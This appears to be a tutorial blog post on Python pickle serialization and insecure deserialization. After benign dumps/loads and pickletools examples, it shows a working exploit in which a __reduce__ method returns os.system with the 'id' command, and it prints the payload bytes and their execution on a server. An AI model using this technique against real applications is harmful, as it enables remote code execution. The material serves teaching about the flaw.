Insecure deserialization is a vulnerability that occurs when a server converts a client-supplied stream of bytes back into an object without checking that the data can be trusted.
Serialization and Deserialization
The process of converting data or an object into a stream of bytes is called serialization; deserialization is the reverse. For example, a game can serialize information about the player in order to store it, and a web app can store session-related data on the client side, which the application reads back later to reduce the number of requests to the backend server and make the application faster.
Let’s take an example of serialization in Python, where the pickle module is used to serialize and deserialize data.
import pickle  # for serialization and deserialization

# A user class to create some data objects
class User:
    def __init__(self, name, age):
        self.name = name
        self.age = age

    def summary(self):
        return "{} is {} year(s) old.".format(self.name, self.age)

# creating an object
hacker = User('Elliot Alderson', 29)
print(hacker.summary())
Now let’s serialize the object using the dumps() function from the pickle module.
# Serializing the data using dumps() function
serialized = pickle.dumps(hacker)
print(serialized)
And here’s the output of our little program:
Elliot Alderson is 29 year(s) old.
b'\x80\x04\x95>\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04User\x94\x93\x94)\x81\x94}\x94(\x8c\x04name\x94\x8c\x0fElliot Alderson\x94\x8c\x03age\x94K\x1dub.'
[Finished in 22ms]
Now this serialized data can be transferred via the network or can be stored on the disk as a file.
# storing the serialized data in a local file
with open('user_data.pkl', 'wb') as file:
    file.write(serialized)
print("Serialized object is written in 'user_data.pkl' file.")

# | Output -----------------------------------
# | Elliot Alderson is 29 year(s) old.
# | b'\x80\x04\x95>\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04User\x94\x93\x94)\x81\x94}\x94(\x8c\x04name\x94\x8c\x0fElliot Alderson\x94\x8c\x03age\x94K\x1dub.'
# | Serialized object is written in 'user_data.pkl' file.
# | [Finished in 20ms]
# |
# | $ cat user_data.pkl
# | ��>�__main__��User���)��}�(�name��Elliot Alderson��age�Kub.
# |
# | $ file user_data.pkl
# | user_data.pkl: data
We can get a quick disassembly of the serialized data using the pickletools module, which ships with Python’s standard library.
import pickle       # for data serialization and deserialization
import pickletools  # for data disassembly

# The User class
class User:
    def __init__(self, name, age):
        self.name = name
        self.age = age

    def summary(self):
        return "{} is {} year(s) old.".format(self.name, self.age)

# Reading data from saved serialized object file
with open('user_data.pkl', 'rb') as fh:
    serialized = fh.read()

# getting the disassembly of serialized data
# (dis() prints the listing itself and returns None, so no print() is needed)
pickletools.dis(serialized)

# Output -----------------------------------
# |     0: \x80 PROTO 4
# |     2: \x95 FRAME 62
# |    11: \x8c SHORT_BINUNICODE '__main__'
# |    21: \x94 MEMOIZE (as 0)
# |    22: \x8c SHORT_BINUNICODE 'User'
# |    28: \x94 MEMOIZE (as 1)
# |    29: \x93 STACK_GLOBAL
# |    30: \x94 MEMOIZE (as 2)
# |    31: )    EMPTY_TUPLE
# |    32: \x81 NEWOBJ
# |    33: \x94 MEMOIZE (as 3)
# |    34: }    EMPTY_DICT
# |    35: \x94 MEMOIZE (as 4)
# |    36: (    MARK
# |    37: \x8c SHORT_BINUNICODE 'name'
# |    43: \x94 MEMOIZE (as 5)
# |    44: \x8c SHORT_BINUNICODE 'Elliot Alderson'
# |    61: \x94 MEMOIZE (as 6)
# |    62: \x8c SHORT_BINUNICODE 'age'
# |    67: \x94 MEMOIZE (as 7)
# |    68: K    BININT1 29
# |    70: u    SETITEMS (MARK at 36)
# |    71: b    BUILD
# |    72: .    STOP
# | highest protocol among opcodes = 4
Deserialization can be done using the loads() function from the pickle module.
# deserialization of the data
deserialized = pickle.loads(serialized)
print(deserialized.summary())

# Output ------------------------------------
# | Elliot Alderson is 29 year(s) old.
The complete script
import pickle       # for serialization and deserialization
import pickletools  # for data disassembly

# A user class to create some data objects
class User:
    def __init__(self, name, age):
        self.name = name
        self.age = age

    def summary(self):
        return "{} is {} year(s) old.".format(self.name, self.age)

# creating an object
hacker = User('Elliot Alderson', 29)
print(hacker.summary())

# Serializing the data using dumps() function
serialized = pickle.dumps(hacker)
print(serialized)

# storing the serialized data in a local file
with open('user_data.pkl', 'wb') as file:
    file.write(serialized)
print("Serialized object is written in 'user_data.pkl' file.")

# Reading data from saved serialized object file
with open('user_data.pkl', 'rb') as fh:
    serializedfd = fh.read()

# getting the disassembly of serialized data
# (dis() prints the listing itself and returns None)
pickletools.dis(serializedfd)

# deserialization of the data
deserialized = pickle.loads(serialized)
print(deserialized.summary())
The Vulnerability and Exploit
The Vulnerability
The vulnerability arises when an application deserializes input that the user can control, because the user can very well add malicious code or data that harms the system. For example, suppose a web app uses serialization and deserialization to store some information in a session cookie, which is held on the client side and deserialized again on the server side. Because the cookie lives on the client, nothing stops us from replacing it with malicious data that we serialized ourselves before it is sent back to the server.
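The scenario above can be sketched roughly as follows. This is only an illustration under stated assumptions, not code from a real application: load_session is a hypothetical helper, and the base64 encoding and cookie layout are assumptions about how such a cookie might be transported. It uses harmless data only, to show that the server accepts whatever the client sends back.

```python
import base64
import pickle

# Hypothetical server-side helper (name and cookie format are assumptions).
def load_session(cookie_value):
    raw = base64.b64decode(cookie_value)
    # Unsafe: these bytes come from the client and are trusted blindly.
    return pickle.loads(raw)

# The cookie the application expects to get back.
honest_cookie = base64.b64encode(
    pickle.dumps({"user": "elliot", "admin": False})
).decode()
print(load_session(honest_cookie))

# The client is free to send a different, self-made cookie instead.
forged_cookie = base64.b64encode(
    pickle.dumps({"user": "elliot", "admin": True})
).decode()
print(load_session(forged_cookie))
```

Here the client only tampers with data. The exploit in the next section goes further and makes the server run a command.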
The Exploit
Let’s demonstrate this practically.
import pickle  # for serialization and deserialization
import os      # used later to get command execution

class User:
    def __reduce__(self):
        return (os.system, ('id',))
The key function in this script is the __reduce__() function. Some parts of an object cannot be pickled (serialized) directly, like an open file handle, so pickle lets a class define __reduce__() to describe how the object should be rebuilt when it is deserialized.
The __reduce__() Function
The __reduce__() function is called while the object is being serialized, and it should return a tuple. The 1st value should be a callable and the 2nd value should be the arguments for that callable, which must also be a tuple since there can be more than one argument. pickle stores a reference to the callable together with the arguments, and calls it when the data is deserialized in order to rebuild the object. So __reduce__() is not a cleanup function: whatever callable it returns will run on the machine that loads the data.
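A minimal sketch of this behaviour, using a harmless callable. The Demo class is a hypothetical name made up for the illustration, and the built-in int stands in for the callable; the point is only to show what ends up in the payload and what loads() gives back.

```python
import pickle

class Demo:
    def __reduce__(self):
        # Return (callable, argument tuple). pickle stores a reference to
        # the callable plus its arguments instead of the Demo instance.
        return (int, ("42",))

payload = pickle.dumps(Demo())
print(b"Demo" in payload)  # False: the class itself is not in the payload
print(b"int" in payload)   # True: the callable's name is stored instead

result = pickle.loads(payload)  # int("42") is called here, while loading
print(type(result), result)     # <class 'int'> 42
```

Note that loads() returns the callable's return value, not a Demo object, which is why swapping int for something like os.system leads to command execution.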
Now let’s add a malicious __reduce__() function to the object to get command execution.
import pickle  # for serialization and deserialization
import os      # used later to get command execution

# The original user class
class User:
    # __reduce__() is called during serialization; the callable it
    # returns is executed when the data is deserialized.
    def __reduce__(self):
        return (os.system, ('id',))

    def __init__(self, name, age):
        self.name = name
        self.age = age

    def summary(self):
        return "{} is {} year(s) old.".format(self.name, self.age)

# creating an object using user class
hacker = User('Elliot Alderson', 29)

# serializing the object
serialized = pickle.dumps(hacker)
print(serialized)

# Output -------------------------------------------
# | b'\x80\x04\x95\x1d\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x02id\x94\x85\x94R\x94.'
# | [Finished in 20ms]
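This script prints our malicious serialized payload. Note that the payload does not contain the User object or the __reduce__() function itself, only a reference to os.system (shown as posix.system on Linux) and its argument 'id'.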
Now let’s load the data on the server side. Here’s server.py:
import pickle

# our modified object with the reduce method
serialized = b'\x80\x04\x95\x1d\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x02id\x94\x85\x94R\x94.'
pickle.loads(serialized)

# Output --------------------------------------
# | uid=1000(elliot) gid=1000(elliot) groups=1000(elliot),108(vboxusers),962(docker),994(input),998(wheel)
# | [Finished in 26ms]
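The same payload can also be inspected without running it. The sketch below uses pickletools.genops(), which only parses the byte stream and does not import or call anything, to pull out the strings and opcode names. The variable names are made up for the illustration; the payload bytes are the ones printed earlier.

```python
import pickletools

# The malicious payload from the exploit script, split across two lines.
payload = (b'\x80\x04\x95\x1d\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94'
           b'\x8c\x06system\x94\x93\x94\x8c\x02id\x94\x85\x94R\x94.')

# genops() yields (opcode, argument, position) for each instruction.
opcodes = [(op.name, arg) for op, arg, pos in pickletools.genops(payload)]

strings = [arg for name, arg in opcodes if name == "SHORT_BINUNICODE"]
names = {name for name, _ in opcodes}

print(strings)  # ['posix', 'system', 'id']
print("STACK_GLOBAL" in names and "REDUCE" in names)  # True
```

STACK_GLOBAL looks up posix.system and REDUCE calls it with the argument tuple, which is exactly the step that executes the id command when pickle.loads() processes the data.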